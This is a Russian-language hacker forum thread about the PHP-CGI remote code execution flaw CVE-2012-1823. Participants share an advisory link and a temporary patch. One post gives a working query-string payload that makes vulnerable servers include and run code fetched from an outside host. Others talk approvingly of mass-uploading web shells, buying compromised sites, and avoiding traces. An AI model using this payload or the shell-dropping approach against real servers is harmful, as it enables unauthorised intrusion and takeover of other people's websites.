Критическая уязвимость PHP случайно опубликована в открытом доступе

нихерррасе. я че то пробовал. не получалось именно какой то файл посмотреть, тока индекс, щас еще раз попробую)

 

to BLurpi^_^
Не хорошо делать перепост найденных чужих уязвимостей, с других форумов!

З.Ы.
Скоро на всех форумах страны... Школьники завалят всех шеллами, заливка в два клика происходит как никак!

 

http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

Спасиб за ответ! Ща буду дальше разбираться)))

 

Ну и как с помощью него залить любой файл или удалено выполнить код

 

что то не видно чтобы шеллы тоннами продавали)

прикупил бы пару трафистых по дешевке))

 

Что за херь ты жрешь..

 

Еще не понятно. Написано:

но ведь по данной ссылке:

и работает. хз.

 

FastCGI не подвержен.

 

Пример выше это опровергает же.

 

Небольшая заплатка до выхода оффициальной:

При особых условиях должна выручить

 

спамер, спамер!
а за заплатку сенкью.

 

Седари, позвольте полюбопытствовать, каким образом вы отличается CGI / FastCGI / модуль апача извне?

 

Не задавай глупых вопросов.

 

?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://domain.com/code.txt

code.txt

 

[off]это абсолютный рекорд...за 2 дня 6000+ просмотров новости...[/off]

 

to BigBear

У меня все работает, вот только когда ты заливаешься на сайт, понимаешь, ты такой не один... Вот только наши школьники не умеют заливаться без следов. И чувствую что большинство хостингов, на которых были найдены данные баги, скоро лавочку прикроют!

 

Вот странно, что никто ранее не нашел эту уязвимость...,, сорцы php точно смотрел orb(создатель wso), показывал какой то отрезок из safe_mod.c, неужели их смотрело так мало людей\смотрели так невнимательно, что не смогли обнаружить?